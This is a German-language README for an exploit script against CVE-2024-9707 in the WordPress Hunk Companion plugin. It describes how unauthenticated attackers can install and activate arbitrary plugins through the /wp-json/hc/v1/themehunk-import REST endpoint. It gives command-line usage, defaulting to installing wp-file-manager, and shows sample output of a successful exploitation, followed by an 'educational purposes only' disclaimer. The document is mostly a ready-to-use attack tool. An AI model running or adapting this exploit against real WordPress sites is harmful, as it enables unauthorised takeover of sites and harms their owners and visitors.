
Das Hunk Companion Plugin für WordPress: Anfällig für nicht autorisierte Plugin-Installation/-Aktivierung (Versionen bis einschließlich 1.8.4)
Dieses Skript nutzt die Schwachstelle im WordPress Hunk Companion Plugin (CVE-2024-9707) aus, die es nicht autorisierten Angreifern ermöglicht, über den REST-API-Endpunkt /wp-json/hc/v1/themehunk-import beliebige Plugins zu installieren und zu aktivieren.
| Funktion | Beschreibung |
|---|
| Plugin-Versionserkennung | Überprüft automatisch die Plugin-Version. |
| Schwachstellenprüfung | Stellt fest, ob die erkannte Version anfällig ist (<= 1.8.4). |
| Plugin-Installation | Nutzt die Schwachstelle aus, um ein angegebenes Plugin zu installieren und zu aktivieren. |
requests, argparse.pip install requests
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site.
-p PLUGIN, --plugin PLUGIN
Plugin name (default: wp-file-manager).
python CVE-2024-9707.py -u <TARGET_URL> [-p <PLUGIN_NAME>]
python CVE-2024-9707.py -u https://example.com -p wp-file-manager
Detected version: 1.8.4
The site is vulnerable. Proceeding with exploitation.
Plugin installed and activated successfully.
Response Status: 200
Response Body: "http:\/\/192.168.100.74\/wordpress"
Dieses Skript ist nur für Bildungszwecke gedacht. Verwenden Sie es verantwortungsbewusst und nur auf Systemen, die Sie besitzen oder für die Sie eine ausdrückliche Erlaubnis zum Testen haben. Die Autoren haften nicht für Missbrauch oder Schäden, die durch dieses Tool verursacht werden. von: Khaled_alenazi | Nxploited